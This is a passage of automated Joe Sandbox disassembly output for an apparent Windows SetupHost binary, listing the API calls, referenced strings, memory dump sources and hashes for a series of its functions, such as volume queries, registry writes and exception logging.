                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000208,00000001,?,00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D489
                                                                                                                          • Part of subcall function 0053D470: HeapAlloc.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D490
                                                                                                                          • Part of subcall function 0053D470: GetVolumePathNameW.KERNEL32(00000000,00000000,00000104,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4A9
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000208,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4B9
                                                                                                                          • Part of subcall function 0053D470: HeapAlloc.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4C0
                                                                                                                          • Part of subcall function 0053D470: GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000104,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4D3
                                                                                                                          • Part of subcall function 0053D470: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D513
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D51F
                                                                                                                          • Part of subcall function 0053D470: HeapFree.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D526
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D532
                                                                                                                          • Part of subcall function 0053D470: HeapFree.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D539
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocVolume$CloseHandleName$CreateErrorFileLastMountPathPoint
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1244954680-4108050209
                                                                                                                        • Opcode ID: ad863efe222eab963af94e4181f458be78d236a86583094e24e701503cd3e0d1
                                                                                                                        • Instruction ID: 483336878995dfdfed87ea09e97d6c4828ea737db940d485e1b4e672e90a6054
                                                                                                                        • Opcode Fuzzy Hash: ad863efe222eab963af94e4181f458be78d236a86583094e24e701503cd3e0d1
                                                                                                                        • Instruction Fuzzy Hash: B7519D71E003199BDB10DFA8E8887AEBFB9BF48315F144629E815EB290D7749D45CBA0
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004ED436
                                                                                                                        • GetVolumeNameForVolumeMountPointW.KERNEL32(003A003F,?,00000032), ref: 004ED448
                                                                                                                        • GetLastError.KERNEL32 ref: 004ED452
                                                                                                                        Strings
                                                                                                                        • SetupHost: Reporting external storage location for download to WU [%s], xrefs: 004ED49B
                                                                                                                        • CSetupHost::ReportStorageLocation, xrefs: 004ED405, 004ED46D
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004ED505
                                                                                                                        • StorageDriveLetter, xrefs: 004ED50B
                                                                                                                        • SetupHost: Putting external storage location for download in Reg [%c], xrefs: 004ED541
                                                                                                                        • ?, xrefs: 004ED3D7
                                                                                                                        • \, xrefs: 004ED3E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Volume$ErrorLastMountNamePointmemset
                                                                                                                        • String ID: ?$CSetupHost::ReportStorageLocation$SYSTEM\Setup\MoSetup\Volatile$SetupHost: Putting external storage location for download in Reg [%c]$SetupHost: Reporting external storage location for download to WU [%s]$StorageDriveLetter$\
                                                                                                                        • API String ID: 3209952719-2916804376
                                                                                                                        • Opcode ID: b9098313ec33dbdc8e8d858ada87d4b06d596c6ba393361b98c2f8e3d3b9180d
                                                                                                                        • Instruction ID: 76e00dd217694a8a979ba242df0ee1ca86bf0402da2472242783c9e9ed544ff1
                                                                                                                        • Opcode Fuzzy Hash: b9098313ec33dbdc8e8d858ada87d4b06d596c6ba393361b98c2f8e3d3b9180d
                                                                                                                        • Instruction Fuzzy Hash: 1141D374B00218ABCB04ABA5CC99A3EB7A5FF58715F14805BE905DB381DF78AD01CB99
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?), ref: 004FD31F
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventRegister), ref: 004FD33E
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventUnregister), ref: 004FD351
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventEnabled), ref: 004FD364
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventWrite), ref: 004FD377
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                                                                                                        • API String ID: 667068680-1838325978
                                                                                                                        • Opcode ID: f3c3e71c4caaefae9f96546241106a308bba9bf99d32410b361457f36e6dfeb7
                                                                                                                        • Instruction ID: c3f0d41af2c402686e8ca90304ecf64bb32db2d2f3f117f70369d566cc8f2048
                                                                                                                        • Opcode Fuzzy Hash: f3c3e71c4caaefae9f96546241106a308bba9bf99d32410b361457f36e6dfeb7
                                                                                                                        • Instruction Fuzzy Hash: 31112E70C013A8EBCB509F50BD5895D7BB6EF28B02760401FF90693278D3754A08EF95
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053F223
                                                                                                                        • memset.MSVCRT ref: 0053F236
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0053F323
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,004C44E0,004C44A8,00000000,<unknown>,WdsLogStructuredException,?,00000000), ref: 0053F394
                                                                                                                          • Part of subcall function 0053EF6D: memset.MSVCRT ref: 0053EF95
                                                                                                                          • Part of subcall function 0053EF6D: GetTempFileNameW.KERNEL32(C:\$Windows.~WS\Sources\Panther\,mnd,00000000,?), ref: 0053EFB5
                                                                                                                          • Part of subcall function 0053F038: GetCurrentThreadId.KERNEL32 ref: 0053F09D
                                                                                                                          • Part of subcall function 0053F038: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F0BA
                                                                                                                          • Part of subcall function 0053F038: GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0C1
                                                                                                                          • Part of subcall function 0053F038: GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0E1
                                                                                                                          • Part of subcall function 0053F038: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C), ref: 0053F0F8
                                                                                                                          • Part of subcall function 0053F038: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F10B
                                                                                                                        Strings
                                                                                                                        • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s., xrefs: 0053F2FB
                                                                                                                        • <unknown>, xrefs: 0053F1EE, 0053F33C
                                                                                                                        • (T, xrefs: 0053F2C6
                                                                                                                        • WdsLogStructuredException, xrefs: 0053F337
                                                                                                                        • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p)., xrefs: 0053F309
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Currentmemset$ProcessView$CreateErrorLastMappingNameSizeTempThreadUnmap
                                                                                                                        • String ID: <unknown>$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p).$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s.$WdsLogStructuredException$(T
                                                                                                                        • API String ID: 843016236-548871019
                                                                                                                        • Opcode ID: 04d69c34f47d7777038d2bda328ec7cbd22e84387387ab21052a8103cbb61796
                                                                                                                        • Instruction ID: c3f2e41fe4bba94d53d07e38e92cf76d8bb34e3f8c978759274d6936a90f3e19
                                                                                                                        • Opcode Fuzzy Hash: 04d69c34f47d7777038d2bda328ec7cbd22e84387387ab21052a8103cbb61796
                                                                                                                        • Instruction Fuzzy Hash: 6B5163B5E002199FCB60DB24CC55BDE7BB9BB48310F5041EAB609A7291DB709E85CF68
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 00521327
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 0052133D
                                                                                                                        • GetOverlappedResult.KERNEL32(?,00000001,00000001,00000001,?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 00521371
                                                                                                                          • Part of subcall function 005211C8: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 005211F3
                                                                                                                          • Part of subcall function 005211C8: NtQueryInformationFile.NTDLL ref: 00521240
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 005213A3
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 005213B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileInformation$HandleOverlappedQueryResult
                                                                                                                        • String ID: PgU$PgU$ReadWriteDataInternal
                                                                                                                        • API String ID: 3117618773-3679376002
                                                                                                                        • Opcode ID: d014708560034d990b906fcb6e41d2e4c3c643439f342ec2dcb830c5ecb2019e
                                                                                                                        • Instruction ID: 973b43ebc30834d64883d9cc45f0c1d0be87209e112fbdaecdc5002bea89f646
                                                                                                                        • Opcode Fuzzy Hash: d014708560034d990b906fcb6e41d2e4c3c643439f342ec2dcb830c5ecb2019e
                                                                                                                        • Instruction Fuzzy Hash: EB31D636600A29EB9B00CBA6AC44ABF7BBABFB5351F114815F905D7680D730DD01D768
                                                                                                                        APIs
                                                                                                                        • GetProcessPreferredUILanguages.KERNEL32(00000008,?,00000000,?,?), ref: 004F4105
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004F4146
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004F414D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 004F41CE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004F41D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreeLanguagesPreferred
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 579015856-0
                                                                                                                        • Opcode ID: 3390e04dcd0862fd4ee5c3f186a6462139fa5a958426fb29d9c0600e52c879ca
                                                                                                                        • Instruction ID: b54bf3bc995c51059e3577b90ad520b1203aa0df5acb74e464b863a9b7ae9b61
                                                                                                                        • Opcode Fuzzy Hash: 3390e04dcd0862fd4ee5c3f186a6462139fa5a958426fb29d9c0600e52c879ca
                                                                                                                        • Instruction Fuzzy Hash: 5A31E03AA0021DABCB11DBE09958BBF76B9ABD4711F200016F705D7280DE38CA059BA8
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0051834D: memset.MSVCRT ref: 00518369
                                                                                                                          • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
                                                                                                                          • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
                                                                                                                          • Part of subcall function 0051A546: memset.MSVCRT ref: 0051A55F
                                                                                                                        • memset.MSVCRT ref: 0051A376
                                                                                                                        Strings
                                                                                                                        • CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize, xrefs: 0051A346
                                                                                                                        • onecore\base\xml\udom_xmlwalker.h, xrefs: 0051A2D2, 0051A33F
                                                                                                                        • RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator ), xrefs: 0051A354
                                                                                                                        • CXmlLogicalState::Initialize, xrefs: 0051A2D9
                                                                                                                        • RtlXmlInitializeNextLogicalThing(this, &Init), xrefs: 0051A2E7
                                                                                                                        • ,, xrefs: 0051A28D
                                                                                                                        • , xrefs: 0051A2B5
                                                                                                                        • -, xrefs: 0051A34D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$PrintRaiseStatus
                                                                                                                        • String ID: $,$-$CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize$CXmlLogicalState::Initialize$RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator )$RtlXmlInitializeNextLogicalThing(this, &Init)$onecore\base\xml\udom_xmlwalker.h
                                                                                                                        • API String ID: 3387324805-1134685988
                                                                                                                        • Opcode ID: f28b317d4d5e83af8a87d9d913924b273577adeb89eacffed2b961a5bb0b8765
                                                                                                                        • Instruction ID: 763d8b42d9f8e7e1605bd4749b152dc3905ebbb0c0e8498171526044ee2affea
                                                                                                                        • Opcode Fuzzy Hash: f28b317d4d5e83af8a87d9d913924b273577adeb89eacffed2b961a5bb0b8765
                                                                                                                        • Instruction Fuzzy Hash: 1B31A4B6901709AAEB12DFA4D848FDEBFF5BF80314F10891AE425A7341DB749648CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004E2639: strchr.MSVCRT ref: 004E2658
                                                                                                                        • strrchr.MSVCRT ref: 004E22AC
                                                                                                                        • _set_errno.MSVCRT ref: 004E22C3
                                                                                                                        • strtol.MSVCRT ref: 004E22D0
                                                                                                                        • _errno.MSVCRT ref: 004E22F1
                                                                                                                        • strncpy_s.MSVCRT ref: 004E224A
                                                                                                                          • Part of subcall function 0054ED1E: __EH_prolog3_catch.LIBCMT ref: 0054ED25
                                                                                                                        • strncpy_s.MSVCRT ref: 004E2376
                                                                                                                          • Part of subcall function 004E1EE1: UuidCreate.RPCRT4(?), ref: 004E1F0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: strncpy_s$CreateH_prolog3_catchUuid_errno_set_errnostrchrstrrchrstrtol
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 2476975350-2657877971
                                                                                                                        • Opcode ID: ef97e91609261530a8c4af9bf65f05c5cc508739d69d36e057718c9e3b9f437e
                                                                                                                        • Instruction ID: ee295d53ba8ec44b1290cc29f3c1ae9c0113e84d3276dcc89969f8f6091d1b54
                                                                                                                        • Opcode Fuzzy Hash: ef97e91609261530a8c4af9bf65f05c5cc508739d69d36e057718c9e3b9f437e
                                                                                                                        • Instruction Fuzzy Hash: 59517E719083819BD7148B769955BABBBEDBF45302F24849FE882C7381DE7C94408B38
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005254A3: EnterCriticalSection.KERNEL32(00000000,005524A8,00000030,0051DF5C,00000000,00000000,00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005254EA
                                                                                                                          • Part of subcall function 005254A3: GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,0051E358,?,?,00000000), ref: 00525516
                                                                                                                          • Part of subcall function 005254A3: HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052551D
                                                                                                                        • CreateFileW.KERNEL32(00000000,C0010000,00000007,00000000,00000002,48000100,00000000), ref: 00527349
                                                                                                                          • Part of subcall function 005213ED: RtlNtStatusToDosError.NTDLL ref: 005214EF
                                                                                                                          • Part of subcall function 005213ED: RtlNtStatusToDosError.NTDLL ref: 005214FD
                                                                                                                          • Part of subcall function 005213ED: SetLastError.KERNEL32(00000000), ref: 00521519
                                                                                                                        • GetLastError.KERNEL32 ref: 005273F0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 0052740D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527414
                                                                                                                        • SetLastError.KERNEL32(?,00000000), ref: 00527422
                                                                                                                        Strings
                                                                                                                        • Failed to get img event, xrefs: 005273DF
                                                                                                                        • CompressFileBackedByWim, xrefs: 005273D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Heap$Last$FreeProcessStatus$CreateCriticalEnterFileSection
                                                                                                                        • String ID: CompressFileBackedByWim$Failed to get img event
                                                                                                                        • API String ID: 3974560987-1264866896
                                                                                                                        • Opcode ID: 05dc67bb4c45ac3ee0ec643e58391d3f6b52f291cc354cba7f887f4b312bfa56
                                                                                                                        • Instruction ID: 9ce56625c946c8cade6fbef2429a0bc7ea530d8b1f3a8b51393f77aecf764d84
                                                                                                                        • Opcode Fuzzy Hash: 05dc67bb4c45ac3ee0ec643e58391d3f6b52f291cc354cba7f887f4b312bfa56
                                                                                                                        • Instruction Fuzzy Hash: 36415771E04229AFDB10DFA9E885A9EBFF8BF5D710F144525F905E7290D770AC018BA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?,?,?,?,00000001,00000000,00000000), ref: 0054A4C8
                                                                                                                        • RegDeleteTreeW.ADVAPI32(?,QueryParameters,?,?,?,00000001,00000000,00000000), ref: 0054A4F0
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A521
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000), ref: 0054A56B
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000), ref: 0054A57F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDeleteOpenTree_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$QueryParameters
                                                                                                                        • API String ID: 281199228-3368011194
                                                                                                                        • Opcode ID: 4fe708781e14870525f4bff83593a98ee049194bb52821fdb4b0b49a6fd26c90
                                                                                                                        • Instruction ID: 6506e3de0e1bae9fd6328e193b6eeef311526cc1f5273bd9904765c1f41cdb64
                                                                                                                        • Opcode Fuzzy Hash: 4fe708781e14870525f4bff83593a98ee049194bb52821fdb4b0b49a6fd26c90
                                                                                                                        • Instruction Fuzzy Hash: 1A31E673D8123EABCF21DB54CC89AEAFBB8FB14315F0101A6A919A7151D7709E40DBE1
                                                                                                                        APIs
                                                                                                                        • _wcsicmp.MSVCRT ref: 0054C290
                                                                                                                        • _wcsicmp.MSVCRT ref: 0054C2AA
                                                                                                                          • Part of subcall function 0054BB7D: GetProcessHeap.KERNEL32(00000000,00000010,00000000,00000000,?,0054C1A2,?,?,00000000,?,?,?,?,?,0054C0AE,00000000), ref: 0054BB8B
                                                                                                                          • Part of subcall function 0054BB7D: HeapAlloc.KERNEL32(00000000,?,?,?,?,0054C0AE,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 0054BB92
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00549637,00000000,?,?,00000000), ref: 0054C331
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00549637,00000000,?,?,00000000), ref: 0054C338
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process_wcsicmp$AllocFree
                                                                                                                        • String ID: false$null$true
                                                                                                                        • API String ID: 2655604116-2913297407
                                                                                                                        • Opcode ID: 064fa0dba3de7e90fd399813a0643eef738a119a072554bfb36971fa93d79ddc
                                                                                                                        • Instruction ID: 348d7962547c7adb156d885bcc914bc723c1194de0767c1d51b678a53d53284b
                                                                                                                        • Opcode Fuzzy Hash: 064fa0dba3de7e90fd399813a0643eef738a119a072554bfb36971fa93d79ddc
                                                                                                                        • Instruction Fuzzy Hash: 785123329093128BCB60EF64D4585AFBFE4BFC8728F10892EF885D7250EB70D9048796
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400,00000000,005268B9,00000000,00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?), ref: 0053D2E8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D2EF
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,00090310,00000000,00000000,00000000,00000400,00000000,00000000), ref: 0053D310
                                                                                                                        • GetLastError.KERNEL32(?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D31A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D337
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D33E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D453
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D45A
                                                                                                                        Memory Dump Source
